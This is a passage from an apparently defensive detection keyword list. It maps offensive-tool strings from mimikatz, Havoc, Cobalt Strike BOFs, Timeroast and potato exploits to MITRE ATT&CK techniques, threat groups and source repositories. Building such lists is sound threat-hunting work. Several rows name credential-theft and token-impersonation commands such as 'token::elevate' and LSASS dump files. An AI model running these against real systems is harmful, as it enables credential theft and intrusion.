of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*timemachine_cmd_injection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*timeroast.ps1*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*timeroast.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*timestomp c:*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*timing_attack * --brute-force*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*timwhitez/Doge-Loader*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,ntlm decoder,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*tls-scanner -connect *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tmdb-get-company-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*tmp*ciscophones.tgz*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*tmp*lsass_*.dmp*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Tmprovider.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*to_powershell.ducky_script*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*toggle_privileges.cna*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*toggle_privileges_bof.*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*Toggle_Token_Privileges_BOF*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*ToggleWDigest*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*Tojan:Win32/Goodkit*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token find-tokens*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token impersonate *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token privs-get*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token privs-list*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token steal *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token* -CreateProcess * -ProcessId *,offensive_tool_keyword,AD exploitation cheat sheet,Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token* -ImpersonateUser -Username *,offensive_tool_keyword,AD exploitation cheat sheet,Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token::elevate*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::revert*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::run*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::whoami*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*TokenDump.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenKidnapping.cpp*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*TokenKidnapping.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*TokenKidnapping.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*tokenprivs.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*tokenprivs.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*TokenStealing.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenStealing.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenStomp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*TokenStripBOF/src*,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,1,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -*TokenTactics.psd1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation 